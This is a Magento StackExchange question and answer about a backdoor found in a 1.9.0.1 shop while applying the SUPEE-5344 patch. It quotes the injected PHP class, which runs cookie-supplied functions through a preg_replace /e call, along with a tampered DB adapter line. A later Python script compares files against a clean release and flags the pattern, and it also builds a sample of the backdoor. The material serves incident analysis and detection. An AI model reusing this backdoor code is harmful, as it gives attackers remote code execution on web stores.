Unknown class Mage_Cms_Auth_xaj found in ../Cms/controllers/IndexController.php - malicious or just bad form?

magento.stackexchange https://magento.stackexchange.com//questions/84360

  •  13-12-2019

Question

I was asked to give some advice on a 1.9.0.1 instance which has had none of the recent SUPEEs installed. SUPEE-1533 went in with no problem, but SUPEE-5344 failed, with a message of

patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
Hunk #1 FAILED at 2834.

Investigating the file, I found this code at line 2836:

        if (isset($condition['mhztywsxujkfqokw'])) {
            $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['mhztywsxujkfqokw']);
            unset($condition['mhztywsxujkfqokw']);

The code in an unmodified lib/Varien/Db/Adapter/Pdo/Mysql.php is:

        if (is_array($condition)) {
            if (isset($condition['field_expr'])) {
                $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
                unset($condition['field_expr']);
            }

A find for "mhztywsxujkfqokw" led me to app/code/core/Mage/Cms/controllers/IndexController.php, where I found this appended to the end of the stock Magento class:

class Mage_Cms_Auth_xaj
{
    public function __construct() {
        $auth_cookie = @$_COOKIE['mhztywsxujkfqokw3'];
        if ($auth_cookie) {
            $method = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw2']);
            $auth = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw1']);
            $method("/124/e",$auth,124);
        }
    }
}
$is_auth = new Mage_Cms_Auth_xaj;

The class isn't invoked anywhere else, as far as I can see.

I am just wondering - is this something malicious, or a mod that was poorly implemented by editing two core files?


Solution

This is a hack, probably caused by a missing SUPEE-5344 patch. As I see you posted this at the end of September and SUPEE-5344 was released in early 2015, it's very likely your shop got hacked in between.

The stuff you posted seems related to the SUPEE-5344 vulnerability which is described in detail here: http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability

What do you need to do?

I hope it's not too late and you have taken steps to patch and recover your shop in between.

There are most likely a lot of other files which got changed which you just didn't accidentally detect while applying the patch.

A detailed list on steps to recover can be found here: Magento hacked even after applied patch
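
The answer's point that other files were probably changed can be checked by hashing the shop's PHP files against a clean copy of the same Magento release and then looking inside whatever differs. The Python below is an added example, not part of the original post; the function names, the constructed sample trees and the two heuristics (taken from the snippet in the question) are assumptions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics derived from the snippet in the question (assumed, not a full signature set).
SUSPICIOUS = {
    "callable built from request data": re.compile(r"\$\w+\s*\(\s*@?\$_(COOKIE|GET|POST|REQUEST)\b"),
    "regex literal with /e modifier": re.compile(r"""["']/[^"'\n]*/[imsxuADSUXJ]*e[imsxuADSUXJ]*["']"""),
}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def php_files(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*.php")}

def compare_trees(installed, clean):
    """Return (modified, added, missing) relative paths of .php files."""
    inst, ref = php_files(installed), php_files(clean)
    modified = sorted(f for f in inst.keys() & ref.keys() if sha256(inst[f]) != sha256(ref[f]))
    return modified, sorted(inst.keys() - ref.keys()), sorted(ref.keys() - inst.keys())

def flag_lines(path):
    """Return (line number, reason) for each heuristic hit in one file."""
    hits = []
    for n, line in enumerate(Path(path).read_text(errors="replace").splitlines(), 1):
        hits += [(n, why) for why, rx in SUSPICIOUS.items() if rx.search(line)]
    return hits

def demo():
    """Build two tiny constructed trees (sample data) and report what differs."""
    tmp = Path(tempfile.mkdtemp())
    stock = "<?php\nclass Mage_Cms_IndexController {}\n"
    appended = ('class X { function __construct() {\n'
                '$c = @$_COOKIE["k3"];\n'
                '$m = $c(@$_COOKIE["k2"]);\n'
                '$m("/124/e", $a, 124); } }\n')
    for name, body in (("clean", stock), ("installed", stock + appended)):
        f = tmp / name / "app/code/core/Mage/Cms/controllers/IndexController.php"
        f.parent.mkdir(parents=True)
        f.write_text(body)
    modified, added, missing = compare_trees(tmp / "installed", tmp / "clean")
    return modified, {m: flag_lines(tmp / "installed" / m) for m in modified}

if __name__ == "__main__":
    print(demo())
```

For a real check, point `compare_trees` at the shop root and at an unpacked archive of the exact installed version; files reported as added deserve the same line-level review as modified ones.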

Licensed under: CC-BY-SA with attribution